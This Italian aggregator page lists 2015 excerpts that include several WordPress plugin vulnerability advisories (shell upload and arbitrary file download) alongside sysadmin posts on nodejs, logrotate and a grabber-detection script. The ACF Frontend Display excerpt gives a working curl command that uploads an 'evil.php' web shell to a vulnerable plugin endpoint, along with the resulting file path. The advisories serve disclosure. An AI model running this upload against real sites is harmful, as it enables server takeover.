WordPress Mailcwp 1.99 Shell Upload

14 agosto 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php  doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:
 
  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
.
.
...

Leggi il seguito »

WordPress WP Attachment Export 0.2.3 Arbitrary File Download

10 agosto 2015 - Fonte: http://www.mondounix.com
# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin
v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another...

Leggi il seguito »

Disponibile un nuovo aggiornamento per Flashtool

1 agosto 2015 - Fonte: http://www.androidworld.it

Sony logo final

Il software Flashtool, destinato a tutti coloro i quali intendono flashare un certo firmware Sony sul proprio dispositivo, ha ricevuto da poco un nuovo aggiornamento.

La nuova build 0.9.19.0 introduce il supporto ad alcuni dispositivi Xperia, tra i quali alcuni dotati di chipset MediaTek:

  • Z1
  • Z2
  • Z3
  • Z3+
  • Z4 Tablet
  • E4
  • E4g
  • M4.

E’...

Leggi il seguito »

Demone nodejs per CentOS 6

28 luglio 2015 - Fonte: http://nazarenolatella.myblog.it

Come già affermato in questo post, nodejs ha rappresentato una vera e propria rivoluzione nella programmazione Web, in quanto ha consentito ad un linguaggio nativamente client-side come javascrip, di essere riadattato ed utilizzato come linguaggio server-side.

nodejs

Il funzionamento del suddetto applicativo è abbastanza banale: si richiama il binario da CLI e gli si da in pasto il file...

Leggi il seguito »

Creazione di una logging facility mediante logrotate ed expect

24 luglio 2015 - Fonte: http://nazarenolatella.myblog.it

Scenario

Diversi siti Web (Apache) con N virtual host, ognuno dei quali utilizza 2 file di log dedicati (access ed error), per il salvataggio degli accessi (nel primo caso) e degli errori generati (nel secondo caso).

Problema

Data l’enorme mole di utenza, è necessario comprimere e salvare i suddetti file di log con cadenza settimanale, spostando l’archivio appena ottenuto su di una logging facility (nella fattispecie una linux box), utilizzando il protocollo SFTP.

Soluzione

Integrare...

Leggi il seguito »

sniffer.sh: script bash per l’individuazione dei site grabber

20 luglio 2015 - Fonte: http://nazarenolatella.myblog.it

Scenario

Supponiamo che il vostro sito sia diventato oggetto delle attenzioni di un grabber (di cui non si conosce l’indirizzo IP pubblico), che ogni X tempo ne preleva il contenuto forzosamente.

Supponiamo, inoltre, che il suddetto grabber sia abbastanza intelligente da coprire le proprie tracce “spoofando” lo user agent in modo da apparire come un client lecito.

590x300

Nel...

Leggi il seguito »

WordPress Image Export 1.1 Arbitrary File Download

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
     ...

Leggi il seguito »

WordPress WP-SwimTeam 1.44.10777 Arbitrary File Download

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
 
 
 50             $file = urldecode($args['file'])...

Leggi il seguito »

WordPress WP-Ecommerce-Shop-Styling 2.5 File Download

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
 
 
1 <?php
2 require_once("../../../../wp-admin/admin.php");
3...

Leggi il seguito »

WordPress ACF Frontend Display Shell Upload

13 luglio 2015 - Fonte: http://www.mondounix.com
+---------------------------------------------------------------------------+ 
#[+] Author: TUNISIAN CYBER 
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
#[+] Date: 3-07-2015 
#[+] Type: WebAPP 
#[+] Tested on: KaliLinux 
#[+] Friendly Sites: sec4ever.com 
#[+] Twitter: @TCYB3R 
+---------------------------------------------------------------------------+ 
 
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 
 
File Path: 
site/wp-content/uploads/uigen_YEAR/file.php 
 
Example: 
site/wp-content/uploads/uigen_2015/evil.php 
 
evil.php:...

Leggi il seguito »